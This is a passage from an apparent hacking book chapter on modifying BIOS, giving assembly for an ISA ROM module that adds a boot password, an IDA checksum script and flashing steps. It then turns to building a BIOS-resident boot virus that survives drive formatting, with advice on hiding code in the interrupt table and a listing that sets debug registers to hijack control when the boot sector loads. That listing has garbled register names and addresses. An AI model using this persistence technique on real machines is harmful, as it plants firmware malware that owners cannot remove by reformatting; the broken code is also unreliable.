Baptizing by Fire, or Creating an ISA ROM Module

Now, having described BIOS structure, it is possible to write a custom extension. For simplicity, I'll demonstrate this technique by writing a nonstandard ISA ROM module. As a rule, such modules are used for managing integrated ISA controllers (such as additional COM ports). There is no ISA controller on the motherboard (ISA slots have disappeared from motherboards). However, BIOS continues to support ISA modules ( mainly because programmers do not want to correct the working code that was debugged long ago). The ISA module loads after the main BIOS code (original.tmp) completes execution, and it obtains full control over all equipment, including the PCI bus. If desired, it is also possible to add a custom PCI module; however, this task is much more difficult. To achieve this goal, it will be necessary to set the expansion ROM base address register (XROMBER) and forge the PCI device identifier in the module header so that it corresponds to the identifier of the actual device.

The ISA module is a standard binary file, with a size that is a multiple of 200h bytes, always loadable at the xxxx:0000h address. Part of the equipment (main memory, keyboard, video adapter) are already initialized to the moment of the call to the ISA module, but some other devices (such as hard disks) are not initialized yet. The INT 10h (video) and INT 16h (keyboard) interrupts can be used without hesitation; however, INT 13h (disks) interrupt won't work as easily or as quickly.

The ISA module starts with the standard 55 AA header, and the last byte stores the checksum. The simplest ISA ROM module written in FASM appears as shown in Listing 32.9. In the course of the system boot, this module displays a welcome string and waits for the password. To reenter the password, press <Enter>. This BIOS hack provides additional password protection. Note that no one would be able to crack this protection without replacing BIOS.

Listing 32.9: An ISA module implementing additional password protection

 ; ISAOEM.ASM use16                     ; ISA module operates in the 16-bit segment. DB      55h, 0Ah          ; Boot signature DB      01h               ; Block size in sectors (200h each) JMP     x_code            ; Pass control to the password protection code. x_code:         ; Preparing the registers         ; -----------------------         MOV DX, 101Dh     ; Where to output (DH - Y, DL - X)         MOV SI, text      ; What to output         XOR BX, BX        ; Initial color of characters - 1         MOV CX, 1         ; Output one character at a time.         ; Display color string.         ; _-------------------- print_string:         MOV AH, 02h       ; Function for controlling the cursor         INT 10h           ; Position the cursor.         INC DL            ; Move to the next position.         LODSB             ; Load the next character.         TEST AL, AL       ; Is this the end of the line?         JZ input          ; Exit if yes.         MOV AH, 09h       ; Function for printing a character         INC BL            ; Use all colors, one by one.         INT 10h           ; Print a character.         JMP print_string  ; Loop input:  ; Wait for the password.         ; ----------------------         XOR DX, DX        ; Checksum enters:         XOR AX, AX        ; Function for reading a character from the                           ; keyboard         INT 16h           ; Read the character.         CMP AL, 0Dh       ; Is this ENTER?         JZ input          ; If yes, start the input again.         XOR AH, AH        ; Clear the scan code.         ADD DX, AX        ; Compute the CRC.         CMP DX, 'm' + 's' + 'o' + ']' + '['         JNZ enters        ; If the password is incorrect, continue.         RETF text DB "Matrix has you!", 0 

 

After translating the source file using FASM (issue the FASM ISAOEM.ASM command), you'll obtain the isaoem.bin file. Load this file into HIEW, pad it with zeros to make its size a multiple of 200h bytes, then compute the checksum. The checksum is computed using a standard method: Sum all bytes and find the remainder from division by 100h:sum = (sum + next_byte) & OxFF . The checksum of the entire block must equal zero; consequently, the last byte of the block is (100h - sum) & OxFF. For computing the checksum, I have written a simple IDA script, shown in Listing 32.10.

Listing 32.10: Simple IDA script that automatically computes the checksum

 auto a; auto b; b = 0; PatchByte(MaxEA()-1, 0); for(a  =  MinEA(); a < MaxEA(); a++) {         b  =  (b + Byte(a)) & 0xFF; } b  =  (0x100 - b) & 0xFF ; Message("\n%x\n", b); PatchByte(MaxEA()-1, b); 

 

As a variant, it is possible to use Hex Workshop ( tools   Generate Check sum   8 bit checksum ). In this case, Hex Workshop reports that the checksum is CFh; consequently, the last byte is 100h - CFh == 31h. Write it at the 1FFh offset and exit HIEW. Add the newly-written module into BIOS (by issuing the following command: CBROM.EXE 4PE83619.BIN /ISA ISAOEM.bin ), then flash BIOS using UniFlash or any other utility. Having completed, reboot the system. If everything was done correctly, the boot screen will appear as shown in Fig. 32.4.

Figure 32.4: Hacked BIOS waits for the user to supply a password

It works! And notice that although the standard password-protection set in BIOS Setup can be easily removed by removing a single jumper on the motherboard (Fig. 32.5), this trick won't work in the preceding example. This time, to remove the password protection, it would be necessary to replace BIOS.

Figure 32.5: Standard password-protection set in BIOS Setup can be removed by removing a single jumper on the motherboard; however, this method won't work with the hacked BIOS

Now, it is time to explain how to hack hard disks (for example, it is possible to write a boot virus that would reconstruct itself after formatting the drive). The INT 13h interrupt won't help here, because the ISA block completes operation before disk initialization. Therefore, it is necessary to write a resident module. (Who has said viruses do not live in BIOS?) The main BIOS code always loads the boot/MBR sector at the 0000:7C000h address and passes control to it. Set a hardware breakpoint to this address, and it will be actuated the instant all equipment is already initialized.

The only problem is concealing the extra code. By default, the ISA block is unpacked into the main memory, which later is overwritten by everyone. Long ago, in the time of MS-DOS, many viruses were placed inside the interrupt table, the upper part of which remains unused. The unused space starts from 0000:01E0h and spans to the ~0000:384h address, where it is possible to place approximately 360 bytes of the custom interrupt handler. For hacking purposes, this is enough.

The code shown in Listing 32.11 sets the hardware breakpoint and traps the INT 01h interrupts generated when passing control to the boot sector. Every hacker must write the handler on his or her own. This is a standard boot virus, examples of which can be easily found on the Internet.

Listing 32.11: Interrupt handler passes control the virus code when loading the boot sector

 MOV AX, CS                             ; Trap the TNT 01h interrupt. XOR BX, BX MOV DS, BX MOV [BX], offset our_vx_code           ; Offset of the custom handler MOV [BX + 2], BX                       ; in relation to segment 0000h MOV DS, AX MOV EAX, 00000000000000001100000010b ;                         ;                        > EBit Lx can be set. ;                        > Bit Gx - any. ;                   ;                  > Bits LE & GE. P6 ignores them. ;                                    Therefore, their value is not ;                                    critical. ;              ;             > Interrupt by execution. ;         ;        > LEN Breakpoint length - 1 byte ;MOV EBX, 7C00h ;        ^^^^^^^ - Linear physical buffer address, ;                  by which the boot sector will be loaded. MOV DRV, EAX MOV DR0, EBX ; ^ Load the values into debug registers. Starting from this point, ; any access to the breakpoint will generate INT 01h.